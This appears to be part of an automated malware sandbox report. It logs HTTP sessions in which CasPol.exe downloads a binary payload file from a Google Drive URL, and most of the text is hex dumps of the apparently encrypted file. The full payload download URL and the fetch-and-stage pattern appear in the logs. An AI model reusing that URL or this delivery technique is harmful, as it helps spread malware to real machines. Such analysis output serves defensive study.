2021-12-14 12:42:35 UTC	0	IN	HTTP/1.1 302 Moved Temporarily Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 14 Dec 2021 12:42:35 GMT Location: https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq" Content-Security-Policy: script-src 'nonce-o8Ue8e97XRg1zi7guyrdXw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/ Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]} X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Set-Cookie: NID=511=ny1HnVfXA4gzXE2j0daGLj9kbBeGiPi5om6gcjArGpfG1vuQ_nsPs1f61P4ZTcReyK3Hx2Dg9tH8eg2a5DtlqEnT_lETyWsHb90XGxuH77_sP8DKdroJkTCJFfCHcTbq9GsEgmY9HrAMvK1Iy2rN_GUenNmPHLwNfjxpm9j9STo; expires=Wed, 15-Jun-2022 12:42:35 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-14 12:42:35 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 67 2d 37 73 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 30 39 73 37 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0g-7s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7
2021-12-14 12:42:35 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49804	142.250.181.225	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-14 12:42:36 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/09s7mqju06nhfef03e9jkahgn04c8qp1/1639485750000/01707528263340534167/*/1e3nVGX3LlhNn9Zf6RwTjDw6FKTCAih9T?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-7s-docs.googleusercontent.com Connection: Keep-Alive
2021-12-14 12:42:36 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdv7oasxkE0LshtXIn2paE5jTma5aG8xoqTw5EnV8C0kOj_WR9DrACuPP6bYeYBA9yctbaA-YqJCcZWIYj0rispEcEuNAw Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="RM_hKevVj138.bin";filename*=UTF-8''RM_hKevVj138.bin Content-Length: 221760 Date: Tue, 14 Dec 2021 12:42:36 GMT Expires: Tue, 14 Dec 2021 12:42:36 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=Y/oraA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-14 12:42:36 UTC	6	IN	Data Raw: f0 10 d6 35 fa c6 a8 fc b5 10 66 fb 2f 4f 40 46 6c a3 66 bd ba 54 49 b7 40 8e e0 09 78 bb d5 66 9f 89 69 81 02 3e 75 8c 20 ec 5f 55 c1 9d da 1f 85 b6 8b 50 2b 58 54 f3 2e 20 53 17 66 40 fc f4 ff 53 98 89 da e6 44 c2 82 24 23 6d b5 3f b3 49 e0 02 55 59 48 bc 26 5e f4 1f 46 a0 d9 88 98 a4 75 d5 a7 3a 80 64 cf 63 31 25 b9 77 24 04 f0 ce b6 76 45 7f 39 57 c6 99 ca b7 4a 12 5b 1a bc 7e 8d cb 0f 58 fc ac b6 35 d8 d3 4c 7c d2 78 76 af e3 9c c7 20 ac 0d e5 eb e3 67 2e 79 bb e8 08 9b e5 a5 c0 12 2b 93 8d 17 dd 05 4a c3 7d 20 da 0e 54 71 7e 42 b4 35 7d 4c af 61 90 f7 c9 a4 c6 3e 0a 8e c9 a0 1a 33 9e 41 9e 85 2c 3d 93 d9 b8 30 1f 88 41 ae 68 b8 9f 29 0d a1 ad cc 3b eb 39 f4 40 7e c0 a5 07 9e d9 b3 47 3b fd 47 8a 9e 68 72 0d f8 b0 a3 9e 20 6c 24 68 6d f3 14 75 4d b0 Data Ascii: 5f/O@FlfTI@xfi>u _UP+XT. Sf@SD$#m?IUYH&^Fu:dc1%w$vE9WJ[~X5L\|xv g.y+J} Tq~B5}La>3A,=0Ah);9@~G;Ghr l$hmuM
2021-12-14 12:42:36 UTC	9	IN	Data Raw: ec 17 10 b1 b8 9c 6e e1 f9 9c a2 9b 36 97 cd 5f ef 0b 15 3d 36 8a ef 10 e5 4d bd 39 a9 fb 65 b7 81 c8 73 51 9e c1 27 0c 74 43 73 6e 0a 35 e2 a9 da c3 f6 58 72 7b 25 21 96 44 5c 45 36 02 2c 1d ee 40 72 75 46 81 19 83 51 39 17 ba 52 5f d2 90 1c 54 01 59 c5 5f 05 54 36 01 dd 6f 12 5a cf 62 e8 ee 42 fc 2d 2c 3f 36 8d d2 d0 e1 a7 66 65 d2 06 70 04 b7 fa 72 60 6b da de 48 40 5c 25 63 ad ec ee f2 61 40 a9 a9 e3 55 e8 09 2f 75 d9 eb 6a d0 c5 7b 79 e2 22 07 c7 2a 00 cd 18 40 81 c0 cd 5b 08 68 1e 54 31 1b c6 c7 c5 29 ff c0 3e 37 12 37 54 9b c2 9a fe e6 82 a3 29 ad 73 fa 2a 76 7a f1 6a cc 09 15 99 2a 2a 9f aa 32 9c ba b6 83 6e 5f 18 54 c0 25 9f ef 60 9d 7f 56 49 b9 c4 02 92 c6 16 d8 ee ea b8 73 04 04 da 89 98 b8 fc b3 f4 70 e8 35 15 c1 42 9e 55 b6 7b 15 21 fb 60 98 Data Ascii: n6_=6M9esQ'tCsn5Xr{%!D\E6,@ruFQ9R_TY_T6oZbB-,?6fepr`kH@\%ca@U/uj{y"@[hT1)>77T)svzj**2n_T%`VIsp5BU{!`
2021-12-14 12:42:36 UTC	13	IN	Data Raw: b7 c6 8d c8 90 27 a5 9a e8 13 68 56 a3 9d 04 6b 70 9e 27 4d 9c 7d 69 a9 4f 70 36 b8 62 3a 84 51 5a ac f9 54 6e c1 0e c7 87 2b 87 e6 c6 94 a9 3b 66 38 9b e9 08 79 a7 eb 70 08 ee 04 3b b2 0b bb c2 9a 18 4a 16 96 ce 04 e6 16 0b 41 16 74 82 8e 83 50 e3 0d 2b 37 b4 58 bf 27 99 dc 8d 5c 12 93 50 a9 34 31 15 ba 86 5e d4 3a de cc e8 3a 81 45 d0 1f be f6 b8 7b e0 21 6f a1 cb c3 c8 b5 32 39 2f f2 6c 74 10 db 4b 59 37 be c9 37 86 fe 3a aa 2a 81 f6 79 ff 15 af d9 be 76 46 ee a2 33 5a 74 4b 62 80 f3 b0 57 bf ea 8e 2f 0a 9a 54 b3 06 ac 19 45 c4 b1 d6 1c 71 0c 3c bd 65 e7 06 85 ee ae ac 72 54 df 3f af 3d 24 54 f2 3e a0 df c6 c3 25 78 06 66 1b 77 3f c8 2f aa 9c 6e 1b d9 08 87 96 77 8b 35 bc 71 64 e4 85 6f 5a 6f 03 e8 6a 7a 91 2a 36 4f f7 84 26 0d 4e 5d 8c 5a da be 77 fc Data Ascii: 'hVkp'M}iOp6b:QZTn+;f8yp;JAtP+7X'\P41^::E{!o29/ltKY77:yvF3ZtKbW/TEq<erT?=$T>%xfw?/nw5qdoZojz6O&N]Zw
2021-12-14 12:42:36 UTC	17	IN	Data Raw: 2a 46 6b e6 d7 e0 93 4c 96 19 ae 11 65 c5 52 1c 27 9e 77 70 93 bd ca a0 ed 56 25 1a 50 8c 06 e7 c4 93 02 5d 9a 19 da 90 b4 fe 60 9e 23 e4 a9 90 02 d0 f4 84 04 7c a3 42 35 ca cc 24 c5 38 36 80 0b 08 8f f1 c1 44 c2 8c 4b ee 6d 4a ca 95 58 5f 2a 9d 5b 48 ba 20 76 86 1d 46 a6 f1 af 98 a4 7f ba 6a 3a 80 6e e9 72 36 0d 70 75 24 02 e1 c8 9e 44 47 7f 3f 7f e1 99 ca bd 25 df db 1a b6 58 92 d3 9d 9c fe 18 b9 f0 d1 59 4f 30 19 71 05 c7 8a e5 88 9d de 62 88 bf 93 0d 26 29 d8 86 60 9b 5c 85 a2 7d 2d 3f f7 5c d5 5b 24 e3 33 7c a1 06 01 1e 1a 2d 44 38 61 4e a3 8f 90 f7 cf cb 00 3e 5a c1 17 af 73 1a aa 41 3d 0f 41 75 bb e1 b8 30 15 56 41 bf 80 90 88 29 06 a6 c9 0a 3b b3 30 2a 4c 5e f7 a5 07 94 f1 8b 79 4d f4 99 8a af 60 5a ff f8 b0 a5 f1 e6 2c 24 62 93 fc 31 5d 78 b0 71 Data Ascii: FkLeR'wpV%P]`#\|B5$86DKmJX_[H vFj:nr6pu$DG?%XYO0qb&)`\}-?\[$3\|-D8aN>ZsA=Au0VA);0*L^yM`Z,$b1]xq
2021-12-14 12:42:36 UTC	18	IN	Data Raw: d3 cf b3 25 b9 c9 c6 f6 87 52 ff b5 72 19 e3 37 af da 95 ac fb e3 e5 26 65 69 6f e9 8f cb 0a 38 86 b2 42 64 f4 ef b4 9a 9b 37 b5 13 5f ff 4a 44 ec 20 05 e5 20 8c b3 42 c6 75 f5 2e f6 3d 45 7c 5b 9e da 48 5b 74 43 79 b2 b6 9f 8d 69 c0 c3 fc 36 a0 4b 20 2b 98 7b 31 44 23 02 52 02 ec 68 3f 62 75 b6 45 70 53 39 10 98 7e 77 98 96 34 76 6e 12 c3 4e 08 3d f3 6e 91 65 3a 74 c9 42 c2 b4 54 d4 70 61 3f 30 a1 09 fd 8f e9 66 40 f0 37 6f 36 d2 a6 4f 74 72 db de 3c 42 5c 29 d1 d8 ed ee f8 19 66 e4 ab e7 4b c7 c4 2f 75 d3 f6 88 97 c5 7b 72 fa 65 62 bd 3c 28 03 75 13 87 62 d6 33 51 14 09 52 27 37 c0 82 c7 23 ef a8 e2 35 12 31 3c 8c 96 9a f4 4e 9f e4 5e dd 2b f8 20 c7 cf 36 a7 fe 21 6c 98 27 23 94 f0 53 87 c4 a0 89 7d 5f 27 3d c5 33 86 4a 67 51 5a 7e 2f ba d7 02 1b eb 5e Data Ascii: %Rr7&eio8Bd7_JD Bu.=E\|[H[tCyi6K +{1D#Rh?buEpS9~w4vnN=ne:tBTpa?0f@7o6Otr<B\)fK/u{reb<(ub3QR'7#51<N^+ 6!l'#S}_'=3JgQZ~/^
2021-12-14 12:42:36 UTC	19	IN	Data Raw: 73 3a 81 ae f0 67 bc f8 be 53 7b ce 67 ab e3 e9 c8 b5 38 0b b4 f2 6d 7e 38 9e 49 a7 39 96 52 39 86 f4 12 80 23 81 fc 5e 64 15 af c9 a1 7c cb b1 a2 33 5b 47 d9 62 80 f7 98 2e bd c3 81 07 91 95 54 b9 2e ce 1b 45 c3 99 4d 1c 71 3e 1d b9 65 e9 00 ea 74 e8 a5 78 3b b2 3f af 37 16 cf f2 3f aa c0 cc 4f 28 71 06 67 3d ec 3f c8 45 8b ee 6c 14 df 20 1c 8c 77 81 23 94 51 64 e4 ec 4e c1 6f 0d e2 75 70 60 7c 36 4f f9 ac bd 0d 54 57 a4 28 d8 be 71 d4 52 1e 19 27 47 61 5c 84 19 06 68 21 b6 d3 68 41 35 39 37 0f fc f2 58 6f b5 23 a2 cc 0f d0 3a 01 4a df fe 94 62 0d 46 6b f6 b8 2c 92 4c 9c 21 38 d7 6c c5 2c 1c 27 9e 73 c8 b2 78 c8 af eb 7e ef 00 50 86 f9 e6 ba 9d 02 be 97 75 f2 58 b6 fe 66 47 e0 e4 a9 95 fc d1 94 b2 6b 6d a5 6a f2 c8 cc 22 de 31 1e bc 09 08 89 d7 ec 44 c2 Data Ascii: s:gS{g8m~8I9R9#^d\|3[Gb.T.EMq>etx;?7?O(qg=?El w#QdNoup`\|6OTW(qR'Ga\h!hA597Xo#:JbFk,L!8l,'sx~PuXfGkmj"1D
2021-12-14 12:42:36 UTC	21	IN	Data Raw: 3b da 69 61 f1 0c 7e 4f b7 6d 06 2d b8 00 4f b6 ba cb cf b9 22 a1 e5 c4 dc 90 36 32 b2 6f ed c4 0a a3 a6 9a af 94 08 8a eb 6f 43 7b c4 51 c3 36 ee b0 9e 44 6d f1 fd 87 b8 90 37 b8 d7 a1 ec 27 67 3f 4f cc ef 1a ef 5b 8e fd b0 f0 3c b0 d8 ad 72 77 96 e9 09 0e 74 45 59 72 ac 98 e5 ad 3e c2 da 5b 7e 40 20 26 9f bb 5d 69 21 29 29 34 90 97 c4 8a 40 a1 6d b0 51 2a 26 b2 54 ee 98 90 1c 79 6e 12 d4 49 1c 56 19 ee 91 6f 12 50 d8 46 df 5e 43 d0 41 79 2c 32 87 c5 c3 96 17 67 49 d1 28 5c 36 d8 bf 7f 79 72 d8 f6 15 46 40 dd 0d d1 fd e9 97 0a 68 e4 a1 e1 3c 77 58 2f 7f ff be 18 91 c1 7b 62 ed 3e 8d fc 06 07 c5 7f 89 8a dc d4 77 46 7b 1a 48 d9 32 c4 c2 ee 18 f2 93 b1 37 03 33 4a 0a 97 b6 fb fa 82 be 55 f1 73 eb 24 dc 93 26 cb e2 1e 3f 86 34 2d 87 a3 45 d3 44 b7 a5 7e 4c Data Ascii: ;ia~Om-O"62ooC{Q6Dm7'g?O[<rwtEYr>[~@ &]i!))4@mQ*&TynIVoPF^CAy,2gI(\6yrF@h<wX/{b>wF{H273JUs$&?4-ED~L
2021-12-14 12:42:36 UTC	22	IN	Data Raw: fe e5 01 12 95 3e f9 af 31 1f ba b4 25 d6 32 c7 ea 8d 3b ad 44 ff 7e c2 ee be 53 7f 83 70 a4 ef e6 c0 aa 33 ef b5 de 67 79 2e e0 41 59 31 92 f0 28 8a f8 12 84 36 7f fd 7d 77 13 87 17 a3 7c cc 99 4b 31 5b 5a bf 1a 80 f9 92 24 a0 e6 88 0f 89 64 55 95 3c fc 1f 45 c2 9f 22 e1 71 06 1e d6 9b e7 00 e0 7e b7 a0 78 33 a9 c1 ae 1b 0e d7 fe 3e a2 dd 32 4e 56 69 00 4f 1d ee 3f ce 33 aa c0 6c 1b d5 36 32 dc 69 8d 22 9c 4e 75 1a 82 6b cf 68 2b 99 75 70 17 f5 3e 4f f6 a8 a2 1f 42 57 ac 33 26 bf 5d c7 d8 3f fc 25 49 67 74 62 81 0f 6e 4e c1 d3 68 4b 25 22 3b 0e f4 e4 a6 6e 30 28 b5 c0 01 d8 25 13 03 d7 d2 96 46 08 7e 18 12 47 d3 b9 4c 9c 21 23 21 61 c5 e7 12 27 9e 59 1c bb 69 ca 88 14 7e ef 10 3f b2 f8 e6 b0 f2 37 5d 9e 7f f8 8b 05 fe 66 b6 cc cc 9e 9a fc db 98 aa 43 92 Data Ascii: >1%2;D~Sp3gy.AY1(6}w\|K1[Z$dU<E"q~x3>2NViO?3l62i"Nukh+up>OBW3&]?%IgtbnNhK%";n0(%F~GL!#!a'Yi~?7]fC
2021-12-14 12:42:36 UTC	23	IN	Data Raw: 9c c1 be 79 44 e8 b9 8b 92 6a 65 00 f8 b9 bf 60 21 00 26 43 4f d8 83 72 58 66 7a ff 24 a5 a6 5b f3 73 cb dc 83 22 91 48 c6 f6 8d 13 32 b5 63 05 d6 22 90 2b 8c ac fb e7 9b ef 72 97 64 e3 52 dc 3c 14 b1 a3 46 72 19 d2 b0 a7 8c 1d a2 de 5b ed 1a 68 25 de 04 c3 09 9b 6f bd 39 af d3 c3 b7 c3 59 1c 36 9e c1 2d 06 6d 50 77 6e b6 9c f8 45 c1 ef f3 72 32 50 33 25 81 54 58 5e dd 03 00 17 ea 07 3c 74 46 81 13 95 51 39 12 b8 ce 61 b0 be 1c 5e 64 04 3b 5e 23 66 3d 7d 95 6f 03 54 d0 bc c9 8c 4d ea 3c 44 3f 36 83 5a 70 99 33 6b 69 c2 13 6b 36 c9 b1 64 9e 60 f0 f5 13 51 58 23 1d f9 f1 10 f9 4b 6a cf ae db 3f 78 a7 d0 7d c4 3b 09 8a cc 4a df ff 0f 73 fd 31 30 c8 77 90 86 c0 c7 5c 46 6a 0f 7a 6f 33 e8 c1 45 03 e9 80 b1 49 36 37 53 f0 ba a4 80 cf 8e a4 42 e2 40 e2 5e e4 6d Data Ascii: yDje`!&COrXfz$[s"H2c"+rdR<Fr[h%o9Y6-mPwnEr2P3%TX^<tFQ9a^d;^#f=}oTM<D?6Zp3kik6d`QX#Kj?x};Js10w\Fjzo3EI67SB@^m
2021-12-14 12:42:36 UTC	24	IN	Data Raw: 90 41 12 a3 d8 87 0f 0f e1 12 5f 2c 36 26 b7 2d 86 d2 29 0a 11 93 57 a9 8b 31 15 ba 2e 21 d6 3a dc 39 54 39 81 4f fa 78 ca c5 a7 2d 73 21 6f af cb ec cb b5 3e 39 90 f2 6c 74 b8 96 49 59 35 4b 5b 34 86 f4 10 93 5d b2 e5 2f 6c 15 af d7 89 77 c9 b1 a4 1b 7f 5c d0 68 00 f1 98 2e b9 37 63 05 91 9a 56 a6 56 e7 02 3b ca 99 4d 18 59 0a 17 b9 63 cf 24 ea 74 a4 2c 70 3b be 3b 72 fa 0e cf f2 3c b5 b9 ff 56 04 70 06 67 37 c4 32 cb 25 84 c6 48 1b df 2a 9c 9e 77 81 26 49 fe 66 e4 83 45 de 15 30 fb 0b 78 1d 75 32 67 f8 af bd 0b 66 73 a4 29 d2 3e 79 d4 de 13 c4 b6 4b 61 5c 86 9c 74 5b 38 c7 db 68 41 2b 11 38 0d fc f4 70 4b 1c 2a a8 4c 09 d0 3a 05 20 a5 fc 94 6d 0f 59 4b df a1 52 9b 4c 9c 25 10 4b 67 c5 2a 3a 03 9e 73 16 3b 70 c8 a0 ef a3 ba 18 50 86 d0 e2 ba 9d 04 32 97 Data Ascii: A_,6&-)W1.!:9T9Ox-s!o>9ltIY5K[4]/lw\h.7cVV;MYc$t,p;;r<Vpg72%Hw&IfE0xu2gfs)>yKa\t[8hA+8pKL: mYKRL%Kg*:s;pP2
2021-12-14 12:42:36 UTC	26	IN	Data Raw: 88 a9 86 37 33 5e a7 e0 3c a2 23 ff 5f 40 d3 be 07 8f c2 ac 4e b3 ff 6b 96 af 6d 5a 19 f9 b0 a9 b6 77 2e 24 6e 65 a9 16 75 49 df 09 f8 2c 9e 1e 57 c6 4b d8 d4 b3 30 8a f1 df 08 8c 11 38 a4 79 09 13 35 a3 bb 96 bf e0 e7 9b f0 7a 64 9b ce 7d ca 2d 01 ba 9a 53 6f e7 d9 8f a8 84 39 ac d6 5f fc 10 73 0d de 04 c3 0b f4 4b aa e3 bc 2d b1 9c c3 53 72 48 9b de 16 1f 6f 43 62 75 b8 8f 1c ba ec c9 e7 52 73 9d 33 2a 9e 5d 4f 5e 23 13 37 13 c1 96 3a 59 4d 9a 66 a1 49 ef 05 bb 4b 59 8b 8b 1c 4f 75 0d e1 a1 0e 7e 35 46 84 6e 12 5a cb 53 c3 b1 46 93 54 60 3f 3c 8a cb e2 9d f2 66 74 c3 1f 4c c8 d9 99 78 71 6a c6 20 17 49 43 07 1f e6 ec ff e3 78 48 1a aa cf 46 af 4d 2e 75 d9 ef 14 89 d4 75 1c ff 24 73 f7 39 0d d3 56 00 9a c0 d6 68 59 66 e0 53 0b 39 f9 cc df f5 fa 8b aa 3a Data Ascii: 73^<#_@NkmZw.$neuI,WK08y5zd}-So9_sK-SrHoCbuRs3*]O^#7:YMfIKYOu~5FnZSFT`?<ftLxqj ICxHFM.uu$s9VhYfS9:
2021-12-14 12:42:36 UTC	27	IN	Data Raw: 20 91 15 33 a5 06 82 5f 4c 0b 4f 3c f1 c3 2c f2 3f 90 4b 1c 6f 92 9e d9 1c ec 0f 3b 10 07 4a be 2d 8c dd 10 0c 08 45 42 8e ad 20 1a 98 bc 28 d6 30 cb f5 62 35 9b 99 eb 68 ad e7 a9 89 6c f7 e2 80 e3 e6 c9 a6 28 13 a5 fd 7d 6e 2e 8f 58 71 22 97 52 3d 97 fb 03 9d fc 92 f3 53 75 1a 87 c1 a0 7c c0 a2 ac 22 54 46 c1 6c 56 2f 8b 21 bf fb 87 2f 83 9b 54 b3 22 c5 14 5f 14 8a 42 1e 60 09 3c ab 64 e7 0a e7 65 a1 b6 ae 28 b1 3d be 38 24 dd f3 3e a0 d3 c1 5e 75 62 17 6a e5 3a 2c c7 27 93 e1 44 09 de 20 16 85 72 90 2d 8e 87 77 eb 92 42 d6 b5 14 34 f8 5b 1d 75 37 5c f2 ae ac 02 5f 53 b2 38 dd 96 62 d5 de 1d 1a 36 45 0e 40 85 83 05 51 0d b8 d3 68 49 0f 37 b7 0e fc b2 c7 6f 1c 2a a1 dd 0d bf 27 00 fd dc 91 8a 6c 0d 4c 43 be b8 2c 95 5f 88 30 2c 00 75 cd 04 42 27 9e 75 0f Data Ascii: 3_LO<,?Ko;J-EB (0b5hl(}n.Xq"R=Su\|"TFlV/!/T"_B`<de(=8$>^ubj:,'D r-wB4[u7\_S8b6E@QhI7o*'lLC,_0,uB'u
2021-12-14 12:42:36 UTC	28	IN	Data Raw: a2 d8 85 8f 41 15 5c 52 5c 95 f3 a3 00 16 88 34 af 88 b8 aa 28 06 b1 a5 e4 0b b2 3a fe 57 fb 9f a5 07 9f ca b9 68 47 e8 39 bb bf 68 78 90 e9 ba cc ac 21 2c 2e 7b 49 db 01 74 4f ba 73 97 b4 94 0d 47 ca 76 e3 da b2 21 9b ff c2 99 15 3d 32 bf 61 15 d4 20 bc 8c 0d ae fb e1 9c 66 62 69 65 ce 45 d0 3b 38 12 b2 42 64 ff 5f a3 a2 9b 36 97 fe 5e ed 01 7b b1 1f 05 ef 1b cd fd bd 39 a1 d3 66 b7 c3 59 64 8d 13 ea 27 0c 75 50 74 7f a1 8c ca a2 c3 c3 f0 41 e4 4c 20 21 80 56 57 54 28 14 3d 0b 4e 79 30 62 50 07 52 b0 51 38 b4 a1 5f 64 94 81 10 4a 7a 0a 48 70 0f 52 20 7d 9c 7e 1f 46 de de d9 ad 55 ea de 70 32 21 af 73 c7 8e e3 40 74 d5 16 ff 1a c7 a4 7e 76 fb f4 e7 04 42 56 f3 1e fd ec f5 d0 73 68 e4 a1 cb 67 86 58 25 01 c1 ed 05 99 d6 7c 62 ee 34 74 73 9d 18 16 61 8f f2 Data Ascii: A\R\4(:WhG9hx!,.{ItOsGv!=2a fbieE;8Bd_6^{9fYd'uPtAL !VWT(=Ny0bPRQ8_dJzHpR }~FUp2!s@t~vBVshgX%\|b4tsa
2021-12-14 12:42:36 UTC	29	IN	Data Raw: 78 2a a1 3a cb 98 a3 e1 73 c7 9a c5 0d 58 78 c6 92 20 9b 17 2e 98 0e 82 4c f5 4f 40 3e ea 10 3c 00 3e 90 41 1e 5e 9e e2 0f 0f a3 dc 2a 1f 2f 51 9f 24 06 d6 01 43 d4 93 51 81 dc 17 14 b0 a4 3a f4 24 55 cf 73 3a 80 5c db 78 a4 7b 95 53 7b 20 7c 8f f2 e3 d7 ad 29 32 a2 ec 44 6d 39 9e 43 48 34 80 43 13 90 eb 0a a4 39 80 fc 5b 75 37 be f7 ce 5b cb b1 a8 22 79 4d f3 0d a8 f8 98 24 ac c8 9f 68 b8 9b 54 b3 3f f6 02 2a e8 98 4d 16 60 24 7b 92 64 e7 0a fb 70 b8 bd 7c b5 09 50 83 36 0c c5 e1 1b b5 80 41 64 7a 78 07 74 12 fd 1a d7 0d 93 cf 7a 04 9f 08 0f 97 77 8b 51 b1 50 64 ee 90 61 d0 49 12 c3 1a 52 1c 75 3c 5c d1 bd 9a 25 5a 56 a4 23 f0 e9 73 d4 d8 3f 37 25 49 67 33 fc 83 0f 62 32 91 d4 79 47 3e 11 58 34 fd f2 52 b1 10 3b 84 e0 06 c1 1c 6e aa d6 fe 9e b1 0a 4c b5 Data Ascii: x:sXx .LO@><>A^/Q$CQ:$Us:\x{S{ \|)2Dm9CH4C9[u7["yM$hT?*M`${dp\|P6AdzxtzwQPdaIRu<\%ZV#s?7%Ig3b2yG>X4R;nL
